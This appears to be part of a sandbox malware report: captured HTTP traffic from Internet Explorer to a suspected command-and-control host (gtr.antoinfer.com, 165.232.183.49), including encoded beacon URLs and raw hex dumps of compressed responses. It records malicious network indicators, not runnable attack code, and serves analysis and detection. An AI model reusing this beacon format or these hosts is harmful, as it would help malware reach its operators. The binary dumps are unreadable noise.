Jul 8, 2021 15:46:48.630412102 CEST	7004	IN	Data Raw: 16 ed 59 01 f9 ad 03 23 e7 59 d1 02 96 bb d6 3c bf a7 7f bf d1 73 88 db 2f bf be 41 b9 98 2e 99 3b 6d 3e eb 34 ba 64 aa a5 88 c8 e2 36 a8 42 86 ea 60 e9 06 c0 95 c5 40 3e 5d ff 5b ad f6 43 40 2d 70 d6 fb 75 92 3f ec 93 77 27 0d 83 5e 85 ee 46 d8 Data Ascii: Y#Y<s/A.;m>4d6B`@>][C@-pu?w'^F/R6\Q@!b7M)TBT!~iut5\{>O.Z'G4(FbP?WlpcLSJQA;LWPY6]=Cisg:Rg%kz;PrBYAI
Jul 8, 2021 15:46:48.630470991 CEST	7005	IN	Data Raw: 28 e0 59 fc ce 0b a5 86 f2 45 7a fe 52 d9 13 13 90 37 62 02 c3 9e e8 5d 35 9f dc 1e 4b 13 3e b7 d4 69 e0 ee 31 6b 36 c9 a3 3d 3a 18 29 81 8d 2f 41 bc 31 df 9f da 95 3c e6 b7 94 93 bd cf d8 b5 61 cc 17 15 84 fd a9 3d 25 6e 05 86 de ae ea ee d1 15 Data Ascii: (YEzR7b]5K>i1k6=:)/A1<a=%n@^~Ymj8bK4+eFffZKF<t>nnZfO8cBQ9H+7__O`^hC~aor9++wG@:$KT@,
Jul 8, 2021 15:46:48.630505085 CEST	7006	IN	Data Raw: 3d 2a e3 1f 9d c0 f6 fc 35 5e ca 56 2d de cd 4c 7a e2 7d 5e f8 a9 90 55 d8 cc 26 02 b5 30 a8 7a dc 79 1c 06 b8 63 52 11 47 f9 39 b1 96 8e c5 e8 f9 81 9a bf 1d 76 0a e3 cc ee ff 0a bd 6e 07 51 d1 60 92 48 c4 c8 70 e2 ee 53 3c 5f 57 d0 32 a7 7a a3 Data Ascii: =*5^V-Lz}^U&0zycRG9vnQ`HpS<_W2z)042KCCmz6cqLPUG+ZRXbz^kZ(`u^? hu#q"r>tT~2Q}h~3O!AN^RBhQFg+mZflFL
Jul 8, 2021 15:46:48.630534887 CEST	7008	IN	Data Raw: a1 22 18 4d 37 0b 28 fa e8 7c 4d b7 04 99 f1 1c aa 86 ed cf 84 03 ee d0 db 22 62 0c 6e 9e bf dc 3a c7 0c fe 39 91 d6 7b 2c 31 fd 98 a6 7f d5 c4 7d 70 a4 dd f8 28 31 34 96 66 4e 51 02 a8 a3 f3 cb 81 89 f8 2a 1a 0f e9 70 f5 18 71 df ac 68 12 6c e9 Data Ascii: "M7(\|M"bn:9{,1}p(14fNQ*pqhlI+}hI^4'0k(XJk-sx`)sb4vBd(0Fe2a/37mFu$S6Erw-lqs3dIrEh
Jul 8, 2021 15:46:48.796827078 CEST	7009	IN	Data Raw: 91 56 0b 4f ab ef c2 71 ef 98 25 82 91 6a a9 f3 8f 0f cb 2c 66 eb 23 c5 ca 89 19 55 2d 25 b0 2a ee 79 1b e0 65 2e b9 2c bd 71 7c 42 4b 0f 9f cf e6 84 a8 d9 70 48 b1 e7 4a 8b c0 50 02 e2 83 58 ea 65 d3 cf 85 3e 81 50 c1 5a 61 4a 56 71 cc 71 e3 36 Data Ascii: VOq%j,f#U-%*ye.,q\|BKpHJPXe>PZaJVqq6D7r&b1Tqb6S\|.vVZ)cE94'?&#Z!C2sadbDMJF6!ovh$LYO^Ja_8FcZ"F;B

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49754	165.232.183.49	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Jul 8, 2021 15:46:50.205321074 CEST	7200	OUT	GET /favicon.ico HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: gtr.antoinfer.com Connection: Keep-Alive
Jul 8, 2021 15:46:50.737088919 CEST	7201	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 08 Jul 2021 13:46:50 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Content-Encoding: gzip Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.3	49757	165.232.183.49	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Jul 8, 2021 15:47:30.909945011 CEST	7205	OUT	GET /xFDxUxdbnv/F6OYsZZ54L9nW_2Fn/67TmggSh_2FJ/XC_2BJ4ptUf/_2Bn4_2BufrBke/X9TaUVAWE43KR_2BAaOOd/VFdvQg3iI5nNB7ro/WwH2QRd3S4Jpyvs/BAGj3S8XfXokbtiE7i/hiopX3wKc/HclUJ6ir4iZ2Wbahh_2F/U4T4cSpeeoulqiraG2L/OcnB_2BpDFDp4gpBC5Tkhs/w68xYDIGC4qQh/4p7XqKDy/ZmjFv4NCLUhiS0t8WoyKwxb/hab8TjugII/SNATkC5REfp7kWCrA/g3JBPajXKX1i/qwbd_2FPu7J/lLmh_2BCbPNt2x/W33zXC7gkL52CnQJHgKW5/o596c7z HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: gtr.antoinfer.com Connection: Keep-Alive
Jul 8, 2021 15:47:31.798994064 CEST	7207	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 08 Jul 2021 13:47:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Strict-Transport-Security: max-age=63072000; includeSubdomains X-Content-Type-Options: nosniff Content-Encoding: gzip Data Raw: 32 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 1c 9b c7 72 a3 40 14 45 3f 88 05 19 c4 92 8c c8 39 ed c8 39 67 be 7e e4 29 ef 4c c9 88 ee 7e f7 9e 53 b2 e8 32 af 25 08 fd 9a e7 35 eb a9 e8 89 16 8b 3a cb 84 8f e5 ee d3 54 a8 9b ef 63 04 df 2c dd 96 75 37 a2 f3 eb c5 b6 49 1a e2 24 9c 42 da 4c ed 91 c8 5b dd 99 06 25 54 67 ff 04 bd 67 62 a6 d1 95 db 77 df 9c 3c 26 b5 e4 4b 24 6a 08 0b d4 30 42 29 89 a4 b3 a5 4e b0 d4 d2 f4 7e a5 96 cd 80 24 e0 9a f5 88 7c fd 87 fe 18 23 14 14 10 81 e3 3b c0 9b 3a f9 61 3a 70 24 3f 2c 51 6d 72 28 2c 09 f0 bb 48 d7 60 a2 68 3d 71 7f ef 86 a8 f8 25 8c 9e 8c 2c b4 16 91 7b a9 75 90 4e d2 d4 34 03 46 a0 9e eb 78 06 5a 51 ab 40 77 ed bc 65 8f 7d b6 6f 16 6c ba 34 12 56 36 b3 94 17 d0 46 63 49 18 c3 22 4b b5 0d 2b 83 0f 89 7d 37 d3 77 4d c6 24 34 a0 5c 8e 80 44 da 66 b0 db 06 00 ee 8a 7c 70 2a 5b c8 16 40 d8 e0 9a 14 72 cc ae 4b e9 61 35 b7 f1 4f 1b 0b 7c 9c 72 40 2a ac 6c b6 6b 00 41 48 07 a0 60 e2 e3 b0 7b 10 ae ab 1a c4 37 57 04 f2 ce f5 f9 24 7c c0 3e 7f 0a a2 62 bf 6e 7c ef 7e 26 72 e1 70 87 a8 10 d4 16 f4 91 ca f2 92 fb 0f ed 39 9e a6 e8 f1 6a b4 b9 13 18 5f 0f 26 88 d2 c8 b6 05 6c be 61 12 9b a6 0c 37 4a c3 46 66 46 c5 65 67 26 27 e8 e2 13 16 6f d2 bd 2e fe 57 d1 17 ba 76 0d 3f 3b b7 d4 0f e9 c1 3f d5 dc 75 ec 31 93 42 e3 4b ae 5f 70 c8 c5 6c 7b f7 f2 fa 4a 38 41 aa 64 1f 3e f6 76 b2 8e f7 48 40 5c e3 cf 80 43 17 fd 59 05 4f 50 1e 4d b6 eb 0e d1 fa da 21 6d b2 54 58 e5 ab 53 b6 aa 80 d8 f2 75 97 db be eb c0 33 4b b7 f1 14 c9 3a 6e da 05 99 35 7c 3f fb 84 34 15 4a aa 76 cc 5a bc b9 be a8 5f cd 72 b8 9d a5 10 18 2e 68 68 a8 12 7b 9c 12 a6 b9 54 f5 fc 23 cd 15 0a 2f 8f f3 2a ea 76 dd fd 86 1a 16 d1 31 7d d9 e5 18 96 7c b6 af 54 b0 7b b8 06 d2 70 e6 65 63 ed 45 9b 7d 9d 09 a6 0d fd 2d f8 19 7d 9e e4 c0 6d c5 5b 0a b0 0d 61 d9 d4 07 ea 7e b1 34 6a ed e3 ab ec 2f 76 06 32 54 b5 3a e4 84 85 c1 e1 1b 87 b1 40 bb 93 d5 ba 4e ec c1 18 17 43 81 6b 1e 5d 39 90 cf 31 64 5d 06 82 ba 76 cf 72 0e 9c 5b b3 15 12 47 b1 9d 79 3c f5 68 99 49 32 c3 e9 39 1d 48 8e b8 e1 76 dd bb 3c 87 7f b5 6f b9 cf b3 2c 12 f3 9a 2d 2e 3f 4f 91 bc e5 af 61 17 82 7d ad 87 f7 75 f2 4d c9 38 4f 44 8e eb 5d 44 f5 77 ba 0a de 2d 61 56 45 fb 11 65 c5 4a b3 7d b7 c3 46 2e 0e cf 63 6f a7 d2 f7 ed 31 1e a1 10 72 b7 16 bd d6 ed 90 07 8c 97 73 95 a0 b1 69 44 d0 e3 f8 2d c3 f1 dc 7e 1e f7 77 83 f3 22 f5 72 af 07 b6 25 39 0a 07 4f 2f 08 25 f5 d4 0d 55 7d 82 12 48 20 44 74 b6 71 60 ba 81 3a 1f c6 9a 6f cb a6 25 05 25 e4 79 a7 f8 be e8 6f 47 b9 2d 69 88 81 61 fc 09 4b ca c8 05 f2 ac 83 97 dc 9d bf 39 6b ed 8f 73 c9 94 d3 84 22 12 d4 c1 fb 51 c0 fe 42 6a 66 34 6b dd 1b 3e 59 63 9c 3c d2 f2 78 a6 fa 6a 14 79 dd da a4 83 e5 c1 72 f1 a9 55 69 d5 50 b1 76 a4 24 78 5c 84 9b 2f 42 ca 1a c6 67 bd af 8f 2c b8 1d 1b 99 06 1b 48 91 81 29 1c 7a fc 78 36 70 a8 55 f4 04 be 6e 2d f0 27 10 ab 2f 58 53 5a 4b 58 13 89 4c 03 e1 35 2a 96 45 43 a9 a6 2f 75 11 f4 94 da f7 74 7a 2e 46 59 0d 1c f7 c2 9c 9d c5 6c e4 ec 91 7e 58 32 d4 1f cb 03 c1 f9 e3 9b 59 3c fb ba 3d 0b ca 4b 9f 46 9e 22 23 f7 29 fc 10 a1 8b a0 77 51 9e ed 64 81 6f 93 df 14 8e 2b 31 ce 58 e8 af 38 83 8d d3 20 d5 5d 45 92 c6 59 Data Ascii: 2000r@E?99g~)L~S2%5:Tc,u7I$BL[%Tggbw<&K$j0B)N~$\|#;:a:p$?,Qmr(,H`h=q%,{uN4FxZQ@we}ol4V6FcI"K+}7wM$4\Df\|p[@rKa5O\|r@lkAH`{7W$\|>bn\|~&rp9j_&la7JFfFeg&'o.Wv?;?u1BK_pl{J8Ad>vH@\CYOPM!mTXSu3K:n5\|?4JvZ_r.hh{T#/v1}\|T{pecE}-}m[a~4j/v2T:@NCk]91d]vr[Gy<hI29Hv<o,-.?Oa}uM8OD]Dw-aVEeJ}F.co1rsiD-~w"r%9O/%U}H Dtq`:o%%yoG-iaK9ks"QBjf4k>Yc<xjyrUiPv$x\/Bg,H)zx6pUn-'/XSZKXL5EC/utz.FYl~X2Y<=KF"#)wQdo+1X8 ]EY
Jul 8, 2021 15:47:31.799055099 CEST	7208	IN	Data Raw: 95 c4 99 d6 cd ef 6e 21 65 36 d6 33 da 02 90 a8 ec d5 5e fd e7 0e 32 2f cb ee 6d aa c7 90 b4 15 2d 6e 31 12 aa a2 be 29 e1 a6 0d 09 33 28 b3 c1 30 58 15 32 f2 c4 18 43 db 08 04 50 5d 8d 67 f3 75 85 aa 89 9d c2 b2 0c 48 75 de cc 06 de 76 e8 d4 33 Data Ascii: n!e63^2/m-n1)3(0X2CP]guHuv3@']WPT$W`d6#j<5t"}w;6r'j-j M0l=:X>l=aDJ7RK&4:lN=>sr*SZ/n9
Jul 8, 2021 15:47:31.799098015 CEST	7209	IN	Data Raw: 40 66 29 03 a4 0d f0 f3 a5 1d a7 03 9b 62 44 b1 79 54 46 62 ed 97 0b 35 61 6b 73 85 56 a3 d2 24 d0 32 85 3d 50 df c8 0d 67 bd 5f 61 85 e3 8d 20 1d e9 56 58 b6 a8 59 ec ea c7 b6 d5 8b 25 47 76 fc c0 2b 06 fb ec 68 28 51 05 19 bc b7 d6 b8 cb 9a 31 Data Ascii: @f)bDyTFb5aksV$2=Pg_a VXY%Gv+h(Q1.b:b@',+YV&nU#HFiL_7g/N}H?\|Q%F)<KKjFZ<&](Z>o2M6W;_\P
Jul 8, 2021 15:47:31.799170017 CEST	7211	IN	Data Raw: 20 8c 33 7f d9 62 7d fd da 4a bf 56 c1 e4 e5 3a b4 c2 ec 6b 0d c5 08 3f ba 2a 5a 0f b3 24 f2 60 08 b5 d0 9e 94 6f 88 3d 96 73 92 0d 97 1a 40 c6 eb c7 67 bb 91 bd 30 06 b6 89 c7 44 5a 39 fd 5d 5c f3 f0 3b 73 e6 e9 60 4c fa 9e 61 d6 c2 d7 74 34 fd Data Ascii: 3b}JV:k?*Z$`o=s@g0DZ9]\;s`Lat41sCOMo+_5h\|DP`WTD^L)@g]eHu30AoEwEM>}N~AKKq8-97s&QLo-\@^RP'
Jul 8, 2021 15:47:31.799207926 CEST	7212	IN	Data Raw: 1e 74 d8 da 8c 21 51 99 48 03 92 cc b9 54 2a a5 18 c5 92 bd f9 a2 34 49 fa d8 e9 28 6a 59 f8 87 db f8 fd e9 e5 d6 bd bf 94 c6 38 60 49 6e 9c 02 57 d8 6c ef 25 ab ac 21 6e c1 fa 34 8c ba a4 33 97 e8 08 9f ca 48 f6 e0 e1 66 05 29 3e 5f d1 71 17 e5 Data Ascii: t!QHT4I(jY8`InWl%!n43Hf)>_qE$B.N9pC9XPNyc@d}Wl:6fX+]J%xmdhu19g JHaG3/xxMh==N;g>zQSm*sy"
Jul 8, 2021 15:47:31.799246073 CEST	7214	IN	Data Raw: 04 02 b1 0f bc 07 90 8b 3e 32 f4 8d 77 2b 04 bf 28 e4 91 af 97 3f 96 29 6b 72 40 73 df b1 4d f3 a5 3d 2e 8a c6 ac 0a 5a b5 25 56 42 cc c0 69 d1 db 25 8e 67 4e d0 eb 2d ad 91 f4 7b 52 6a aa 6b 0c cd 89 36 ea e0 9e 9e 63 ef f7 06 d2 2b 58 8f 2a e9 Data Ascii: >2w+(?)kr@sM=.Z%VBi%gN-{Rjk6c+X\|Oz&/m2P""A,IFq6Tdd(eBCg9wD[ZeN\m#,U=0?n^M9Dmbr.61$OgOZK4BL_
Jul 8, 2021 15:47:31.800237894 CEST	7215	IN	Data Raw: 16 ed 59 01 f9 ad 03 23 e7 59 d1 02 96 bb d6 3c bf a7 7f bf d1 73 88 db 2f bf be 41 b9 98 2e 99 3b 6d 3e eb 34 ba 64 aa a5 88 c8 e2 36 a8 42 86 ea 60 e9 06 c0 95 c5 40 3e 5d ff 5b ad f6 43 40 2d 70 d6 fb 75 92 3f ec 93 77 27 0d 83 5e 85 ee 46 d8 Data Ascii: Y#Y<s/A.;m>4d6B`@>][C@-pu?w'^F/R6\Q@!b7M)TBT!~iut5\{>O.Z'G4(FbP?WlpcLSJQA;LWPY6]=Cisg:Rg%kz;PrBYAI
Jul 8, 2021 15:47:31.800282001 CEST	7217	IN	Data Raw: 28 e0 59 fc ce 0b a5 86 f2 45 7a fe 52 d9 13 13 90 37 62 02 c3 9e e8 5d 35 9f dc 1e 4b 13 3e b7 d4 69 e0 ee 31 6b 36 c9 a3 3d 3a 18 29 81 8d 2f 41 bc 31 df 9f da 95 3c e6 b7 94 93 bd cf d8 b5 61 cc 17 15 84 fd a9 3d 25 6e 05 86 de ae ea ee d1 15 Data Ascii: (YEzR7b]5K>i1k6=:)/A1<a=%n@^~Ymj8bK4+eFffZKF<t>nnZfO8cBQ9H+7__O`^hC~aor9++wG@:$KT@,
Jul 8, 2021 15:47:31.800319910 CEST	7218	IN	Data Raw: 3d 2a e3 1f 9d c0 f6 fc 35 5e ca 56 2d de cd 4c 7a e2 7d 5e f8 a9 90 55 d8 cc 26 02 b5 30 a8 7a dc 79 1c 06 b8 63 52 11 47 f9 39 b1 96 8e c5 e8 f9 81 9a bf 1d 76 0a e3 cc ee ff 0a bd 6e 07 51 d1 60 92 48 c4 c8 70 e2 ee 53 3c 5f 57 d0 32 a7 7a a3 Data Ascii: =*5^V-Lz}^U&0zycRG9vnQ`HpS<_W2z)042KCCmz6cqLPUG+ZRXbz^kZ(`u^? hu#q"r>tT~2Q}h~3O!AN^RBhQFg+mZflFL
Jul 8, 2021 15:47:31.800358057 CEST	7219	IN	Data Raw: a1 22 18 4d 37 0b 28 fa e8 7c 4d b7 04 99 f1 1c aa 86 ed cf 84 03 ee d0 db 22 62 0c 6e 9e bf dc 3a c7 0c fe 39 91 d6 7b 2c 31 fd 98 a6 7f d5 c4 7d 70 a4 dd f8 28 31 34 96 66 4e 51 02 a8 a3 f3 cb 81 89 f8 2a 1a 0f e9 70 f5 18 71 df ac 68 12 6c e9 Data Ascii: "M7(\|M"bn:9{,1}p(14fNQ*pqhlI+}hI^4'0k(XJk-sx`)sb4vBd(0Fe2a/37mFu$S6Erw-lqs3dIrEh
Jul 8, 2021 15:47:31.961798906 CEST	7220	IN	Data Raw: 91 56 0b 4f ab ef c2 71 ef 98 25 82 91 6a a9 f3 8f 0f cb 2c 66 eb 23 c5 ca 89 19 55 2d 25 b0 2a ee 79 1b e0 65 2e b9 2c bd 71 7c 42 4b 0f 9f cf e6 84 a8 d9 70 48 b1 e7 4a 8b c0 50 02 e2 83 58 ea 65 d3 cf 85 3e 81 50 c1 5a 61 4a 56 71 cc 71 e3 36 Data Ascii: VOq%j,f#U-%*ye.,q\|BKpHJPXe>PZaJVqq6D7r&b1Tqb6S\|.vVZ)cE94'?&#Z!C2sadbDMJF6!ovh$LYO^Ja_8FcZ"F;B

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.3	49759	165.232.183.49	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Jul 8, 2021 15:47:32.851699114 CEST	7370	OUT	GET /k_2Bld_2B868iR7p/iSLerqiJRFRfRPj/I3sykOYq_2B_2BHlkm/lN1n6_2F_/2BoCebPKrVZFk5Ykbc8d/ir2ifxTr4LNwVXB57AO/naMzNC0NRqAZpafqf_2BA_/2Be4kMQ_2Bs4v/p3vimkya/tnJRXZOQhgPrD4eJIIoOBmz/6_2FqS0VmH/GdEp4ZZJMOcj3fIll/Gr7XyTEKPabp/aWzveP_2B5R/CbkrZ6KMbYewce/4JBfvb8ftJcY5XJZOep1x/uKyVwvTYfdKUGuNG/Emm_2BOgQKRpwFp/DFm1TypwhIB6euZx4o/ZnwoOdebK/P2zkNdJ1mC1FOPRaBbHj/tGtvylAtqDtqZZGz2/K HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: gtr.antoinfer.com Connection: Keep-Alive
Jul 8, 2021 15:47:33.792424917 CEST	7414	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 08 Jul 2021 13:47:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Strict-Transport-Security: max-age=63072000; includeSubdomains X-Content-Type-Options: nosniff Content-Encoding: gzip Data Raw: 32 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 14 9b c5 92 83 50 10 45 3f 88 05 6e 4b 5c 82 3b ec 70 d7 e0 5f 3f 99 9a 75 0a e8 bc be f7 9c 0a e3 22 46 69 4a 89 0d bf 62 27 06 5f dc 34 68 5b b7 0f 81 0d 5d cc 80 e5 82 22 63 e1 ba e3 36 77 6c 8c 96 91 d7 61 a2 07 ea a8 43 79 2a 30 b0 b4 aa 83 50 87 a1 be b8 b2 96 35 fc a5 5e a8 65 97 05 6a 03 3f 3b a3 9c a0 b8 9b 23 79 82 6a 69 f2 e2 c1 c4 96 61 34 d0 04 31 db d6 56 ed cb de c5 3e 77 af 31 80 9a f3 e3 4e 9b ee 39 67 54 ba 17 82 aa 5b 94 fd cd 9a ed 1b 69 74 3d d7 85 4b e9 b8 21 df 46 fa 38 9d 5d ed 78 28 97 26 5c 50 5e d0 2e d1 ad 36 ba 60 2b 5e e7 83 a9 59 56 2e 61 06 4b 6d 91 3c 1b 71 f6 c5 da 09 9c ee 3b 5e bb 5c 1a ba 82 32 b9 6b c8 54 88 12 81 a5 e2 5d df 70 b3 09 0d d6 08 94 1d 83 3a 92 3e 0a ed f7 20 20 1f d7 c2 f2 5b 5b b6 e9 29 71 0e f1 d0 98 40 48 b7 ca ba c5 0c 47 75 57 70 94 09 24 38 50 61 ec b7 6f 9d aa 4f 84 8f ab 74 d0 83 6e b9 b0 7f b7 da 37 ac 8f 1e 73 69 36 ad 37 5b a9 d7 bb ef 0e 21 c8 3d 55 42 78 7b 1c 23 7e e4 62 86 b7 ba df fa 16 32 35 11 86 48 4a e6 cd a0 98 5d 07 a7 c8 da 8d 69 0a aa b7 6d a8 3a 8d a3 88 e6 6c 7b 69 4f a3 bb ff 60 b2 ad 9c 1a e3 12 bc 22 46 35 62 9c 54 06 14 cf 5c b3 62 17 5c 1e 2c 30 70 e3 83 12 73 69 83 d6 1c 9e 3d 4c f6 4b f4 78 c5 10 bc f9 d1 04 13 99 30 00 21 89 64 24 7f 5f 8d 7c e7 d4 c0 87 b9 f4 00 56 99 34 f9 05 36 2a 7e 2e 32 00 1d 97 c3 4d 5c a0 a4 d8 8d cd 8f 3f c1 2a 54 b6 23 1a e8 9f 62 3c ef e3 61 fa 27 fb dd e7 96 89 19 37 d6 58 e2 57 ca e4 7c 83 68 66 b5 a7 69 9d 27 9d 98 d8 d0 c8 84 98 e1 54 9a 48 5b 12 f6 ee ab 6e e1 9b 98 ed 34 19 2f b0 78 58 ab c2 70 b0 6c 80 bf ed 30 8d 4f 89 22 ee 74 83 38 66 a5 38 8e 5c 96 37 08 65 03 4d 5f a3 74 4d 7c ae c5 37 a7 7c 2e 4e 00 ea 98 c2 61 63 ff ac 83 86 c7 9b 0b a0 92 d9 1d e4 5e dc fe 70 64 6e e3 7f 88 de 23 6a 5c 51 6b 0b ab 0b 1e 1b a6 6e aa 95 33 8b e1 b3 75 0d f9 2b 10 2d 54 b3 1f da 4b 89 4a 60 22 59 ac e1 e9 ec 49 3e 88 2d 72 97 63 5f 41 dc b9 df f6 fb 3d dc e2 6c 6f 1d 56 10 98 77 6d eb 31 22 e7 03 03 2e 99 a1 e3 6f 16 4b 1d ec 57 05 63 8b fa 19 ed 11 2a b1 c4 7c 28 ae f0 95 5a 61 a5 bc ce 4f fd 61 c1 d4 df 00 5c 7b 11 2f 56 9f 4c ba ef 23 de c5 7e df e0 a0 9e 9b 0d a6 52 cb b2 d2 5d af 93 c1 ba 99 70 6a 49 e1 2e ac b9 52 98 c7 5c a0 a7 5e 54 87 62 a4 da 40 b7 8f 26 0b 07 6e 9b 14 07 86 ce 01 4e 1f 0b 61 83 d3 f0 ae 29 42 33 28 0c c2 a8 7d 90 d2 33 55 52 84 4a d6 b7 d7 2a 27 e5 55 f3 b5 e7 24 1d 8e 00 3b 95 e4 8e 5d 87 c6 70 41 bd 8f f7 7b 32 7e 9c c2 42 1e 39 29 f0 7f 4b 4b ef cf b7 77 f9 2b 23 b9 49 01 f6 23 f0 bc af 8e 7e 58 32 af be 5f 44 2f b8 bc 08 47 ad e0 1d 04 db 48 e5 db 48 16 ba d5 46 a7 5a d7 2d 09 24 87 ea a7 d2 32 6a 36 0b 87 b3 aa 80 e3 c5 6d 10 e1 56 f7 10 9e c6 5d c9 9d 71 dd 87 0f f0 9a 78 98 f9 c3 de 2a 02 be b1 51 2f f2 6f df 52 13 c7 41 4e dd ce c1 93 9e 8d cd 16 13 d5 2b b3 4a 27 d0 8d e4 a0 8c 75 e7 09 ee 89 17 98 c9 46 e7 c6 6d 95 92 90 a7 4f 6b 8d 06 cd b6 9d 2f ea aa bf 64 8c 37 98 4f 2a 34 f5 2e 78 4d 43 46 b1 33 f6 c1 36 ef 33 e9 df 44 9e cb eb 7a ce 67 80 f6 59 90 fa 83 9c bc 79 b6 3f 17 63 60 ea 8e 94 df 7a 9d ee 8a 34 30 ad f2 73 a0 02 cd 59 f1 c3 78 61 ca 33 29 65 cd Data Ascii: 2000PE?nK\;p_?u"FiJb'_4h[]"c6wlaCy0P5^ej?;#yjia41V>w1N9gT[it=K!F8]x(&\P^.6`+^YV.aKm<q;^\2kT]p:> [[)q@HGuWp$8PaoOtn7si67[!=UBx{#~b25HJ]im:l{iO`"F5bT\b\,0psi=LKx0!d$_\|V46~.2M\?T#b<a'7XW\|hfi'TH[n4/xXpl0O"t8f8\7eM_tM\|7\|.Nac^pdn#j\Qkn3u+-TKJ`"YI>-rc_A=loVwm1".oKWc\|(ZaOa\{/VL#~R]pjI.R\^Tb@&nNa)B3(}3URJ'U$;]pA{2~B9)KKw+#I#~X2_D/GHHFZ-$2j6mV]qxQ/oRAN+J'uFmOk/d7O*4.xMCF363DzgYy?c`z40sYxa3)e
Jul 8, 2021 15:47:33.792463064 CEST	7416	IN	Data Raw: 3a d8 6f be 84 83 e2 58 e3 1a a6 4c a2 e5 39 38 54 b2 07 44 ea 53 a0 f5 0e 04 57 0a ff 3e f4 34 3b 37 a2 cd f3 e9 c6 23 8b 4d 37 53 4d a4 5b 30 d0 88 be c0 e6 82 40 be 3b c3 85 40 36 c8 31 aa 62 66 c7 7e b7 d4 52 da 5d 49 b9 7c 39 35 45 b1 4a 21 Data Ascii: :oXL98TDSW>4;7#M7SM[0@;@61bf~R]I\|95EJ!)UzSr\|=B^Vv;I&r>Xv[cyQ~Ml49c8F%J=`F>.6EF)FyQV}04f]B$,@GB`8r#Fs.\|Y
Jul 8, 2021 15:47:33.792484999 CEST	7417	IN	Data Raw: 69 3e b6 4c 7b 79 e6 99 4e 07 14 0c ca f4 e7 98 26 81 7e 45 ad 2b 05 5f 69 2a a9 36 f6 09 41 8f fd 17 8f 4e 9b bf 89 4a f4 88 9e 1f 3b 65 ee 87 4e 9c af f0 05 25 35 b3 ad c5 bb fa ef d7 96 ad 98 89 86 fc 87 af 0b c6 e3 e5 a9 c7 26 ee 70 bf 75 ea Data Ascii: i>L{yN&~E+_i6ANJ;eN%5&puol"`.~HM< 9_W]@J.8;\|qo{F$#3]Y[U?B#@g&:~Zsg;\1_inoC<
Jul 8, 2021 15:47:33.792505026 CEST	7419	IN	Data Raw: c9 ee 24 f5 66 57 de ac e5 8b d4 a3 60 a1 e5 45 84 a2 c1 61 fe 15 4e 3a a6 d8 1e d9 c6 3e b4 a4 d9 c4 fe 7d 02 1e 63 52 d6 04 bb 1d 58 22 1b 47 6d 14 82 c8 bc cb c0 2d 1c 18 54 ec 0f 56 2a 73 5f 14 e9 b1 a6 db c1 55 f3 fc 5b 19 0b 98 cc 49 e5 06 Data Ascii: $fW`EaN:>}cRX"Gm-TVs_U[I$fPpq05`->MXq([l-cgU"5cm>KT}!)yh(;6o{jLzk%ChT(QSUA^6
Jul 8, 2021 15:47:33.792521000 CEST	7420	IN	Data Raw: 64 56 a5 6a c4 66 d3 48 26 a2 20 ce ed 4b 20 f0 ee fe 48 d5 10 07 71 35 ac 86 32 c8 41 b9 b8 b7 1d 8e 09 e5 c0 e5 1d 6f 2e 9f 7f 2e cf 67 f8 1d 7b c3 ed 78 3f 5c 4f 71 0a 3d a1 27 4c da a7 86 00 70 a6 3a c0 3a 54 48 da e2 d0 b4 d5 5b e8 84 34 2f Data Ascii: dVjfH& K Hq52Ao..g{x?\Oq='Lp::TH[4/X&{iVbae/eg1qNRwm7\|K;N>f#!f>1Y=?Gl$5]-d!?ZJSxf8T:2v/P[,(D
Jul 8, 2021 15:47:33.792538881 CEST	7421	IN	Data Raw: 86 50 5a b6 22 00 c4 82 21 85 5f 10 aa 38 e6 06 f7 ea bb fb 18 02 cc 5e 76 6d 2a 97 ef 43 f1 ca f3 a3 6b 02 3b e0 c1 36 a0 4f d5 b4 42 dd 9a 00 98 d5 59 e3 9c 58 d1 9d 3f 54 06 19 61 3a bf cf 7b af 11 f4 6e 96 b9 41 1d e3 5a 4e 08 b1 8c 6e ed 73 Data Ascii: PZ"!_8^vmCk;6OBYX?Ta:{nAZNns]q6+sG%'QBB-E#JDb?1*G=Ot9rT PF4U1g\|VJs`.g^]o("ogf+=2:a
